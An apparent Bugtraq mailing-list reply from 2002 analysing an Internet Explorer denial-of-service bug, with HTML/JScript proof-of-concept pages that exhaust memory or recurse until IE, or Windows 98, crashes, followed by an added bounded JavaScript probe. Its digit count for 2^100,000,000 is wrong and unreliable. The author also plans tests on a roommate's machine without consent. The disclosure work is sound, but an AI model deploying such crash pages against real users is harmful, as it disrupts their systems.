Bugtraq mailing list archives

Re: IE FORM DOS


From: <SkyLined () mail com>
Date: 19 Jan 2002 19:56:33 -0000


In-Reply-To: <3C4381AE.13487.1AC142@localhost>

I ran your example of the problem with FORMs in IE 6.0 under Win 2k on a 700 MHz AMD K7 / 256 MB RAM.
(Btw. you either have to create a file '1.gif' or change the 'IMG onLoad' to 'IMG onError'.)
After loading the revised example IE starts consuming lots of memory. After 10-20 seconds a message pops up:
----------------------------------------------------------------
A script on this page is causing Internet Explorer to 
run slowly. If it continues to run, your computer may 
become unresponsive.

Do you want to abort the script?
----------------------------------------------------------------
Answering 'yes' will of course stop the script and all will return to normal.
Answering 'no' will keep IE busy for a long, long while. When you try to terminate IE, Windows will report it to be unresponsive, but you can still terminate it safely.

I've examined your code: I think the problem is in the 'for'-loop used to produce the long string:
   v="a";
   for(i=0;i<100000000;i++) {
       v=v+v;
   };
If fully executed, this will produce a string that is 2^100,000,000 bytes long (2^100,000,000 is a number with roughly 810,000 digits: something like the number of atoms on earth or the number of stars in the universe!) I would like to know what kind of system you're running if you can run this code ;)

While testing the problem I (only once) got an "Out of memory on line:xx" error message when the value property of the INPUT object was set, but I can't reproduce this behaviour ;(. This error appears to be of the same type you get when you run a loop like this:
----------------------------------------------------------------
<HTML>
  <BODY>
    <!-- Reassigning src re-fires onError, so the handler recurses until the stack is exhausted. -->
    <IMG id="oImg" src="::" onError="oImg.src = oImg.src;">
  </BODY>
</HTML>
----------------------------------------------------------------
On a Windows 98/98SE machine these errors will mostly crash IE with a 'Stack fault' in one of its Dynamic Link Libraries, but it can be made to halt the entire system by generating a stack fault in KERNEL32.DLL.
On Windows 2000 these errors will mostly generate 'Stack overflow on line:xx' error messages and IE will continue to function. (It is possible to terminate all running IE processes without an error message in this way.)
Other versions of Windows have not been tested.
(See my website for more details on these 'loop' errors, http://spoor12.edup.tudelft.nl/skylined)

I created my own testing JScript; it is somewhat more complicated but does a more thorough test of IE:
----------------------------------------------------------------
<HTML>
  <BODY><FORM id="oForm">
    <INPUT type="text" id="oInput" value="a">
  </FORM></BODY>

  <SCRIPT>
    // Any script error sets the flag; returning true suppresses IE's error dialog.
    bErrorOccured = false;
    window.onerror = errorHandler;
    function errorHandler() {
      bErrorOccured = true;
      return true;
    }
    // Run one statement and report whether it completed without a script error.
    function testCode(sCode) {
      bErrorOccured = false;
      eval(sCode);
      return !bErrorOccured;
    }
    document.write('Testing, please wait ...<BR>');

    // Keep doubling the string until a script error occurs or a length stops matching.
    sString = 'a';
    iExpectedLength = sString.length;
    while(!bErrorOccured && sString.length == iExpectedLength) {
      iExpectedLength = sString.length * 2;
      window.status = iExpectedLength + ' bytes: string...';
      if (!testCode('sString += sString;')) {
        window.status += 'jscript error!';
      } else if (sString.length != iExpectedLength) {
        window.status += 'returned only ' + sString.length + ' bytes!';
      } else {
        window.status += 'ok, value...';
        // Now push the string into the INPUT and check that it round-trips intact.
        if (!testCode('oForm.oInput.value = sString;')) {
          window.status += 'jscript error!';
        } else if (oForm.oInput.value.length != iExpectedLength) {
          window.status += 'returned only ' + oForm.oInput.value.length + ' bytes!';
        } else {
          window.status += 'ok';
        }
      }
      //alert(window.status);
      document.write(window.status + '<BR>');
    }
  </SCRIPT>
</HTML>
----------------------------------------------------------------
This makes (exponentially) increasingly large strings and tries to set the value property to that string. I can make strings of up to 64 MB depending on my system's free RAM. With this test program IE will return a 0-byte or 64 MB string without an error message on my machine when it tries to make a 128 MB string.

I will do some more tests on my roommate's Windows 98 machine when he's not around to stop me, probably tomorrow or the day after that.
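A bounded, modern-JavaScript version of the doubling probe above, added here as an example (not code from the original post) and runnable under Node.js. The `sink` parameter is an assumed stand-in for the INPUT value property, so the probe can tell a thrown error apart from the silent truncation the post observes, and `maxLength` keeps the probe from actually exhausting memory.

```javascript
// Bounded string-doubling probe modelled on the test page above (added example).
// `sink` is a hypothetical stand-in for the INPUT value property: it receives the
// string and returns what it stored, so the probe can tell a thrown error apart
// from a silent truncation. `maxLength` stops the probe before it exhausts memory.

// Default sink: a faithful round-trip, like a well-behaved form field.
function roundTripSink(s) {
  return s;
}

// Doubles 'a' until the sink misbehaves or the next doubling would exceed maxLength.
// Returns { largestOk, stopReason, detail }; stopReason is 'cap', 'error' or 'truncated'.
function probeStringGrowth(maxLength, sink = roundTripSink) {
  let s = 'a';
  for (;;) {
    const expected = s.length * 2;
    if (expected > maxLength) {
      return { largestOk: s.length, stopReason: 'cap', detail: null };
    }
    let grown;
    try {
      grown = s + s; // the 'sString += sString' step from the post
    } catch (e) {
      // Modern engines throw a RangeError ("Invalid string length") here rather
      // than handing back a 0-byte string the way the post describes IE doing.
      return { largestOk: s.length, stopReason: 'error', detail: String(e) };
    }
    if (grown.length !== expected) {
      return { largestOk: s.length, stopReason: 'truncated', detail: 'concat gave ' + grown.length };
    }
    let stored;
    try {
      stored = sink(grown); // the 'oForm.oInput.value = sString' step from the post
    } catch (e) {
      return { largestOk: s.length, stopReason: 'error', detail: String(e) };
    }
    if (stored.length !== expected) {
      return { largestOk: s.length, stopReason: 'truncated', detail: 'sink gave ' + stored.length };
    }
    s = grown;
  }
}

// Constructed sink modelling a field that silently caps its contents at 1 KiB.
function truncatingSink(s) {
  return s.length > 1024 ? s.slice(0, 1024) : s;
}
```

Raising `maxLength` to 2^30 on a 64-bit Node.js build exercises the 'error' branch for real, since V8 refuses to build strings longer than roughly 2^30 characters.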

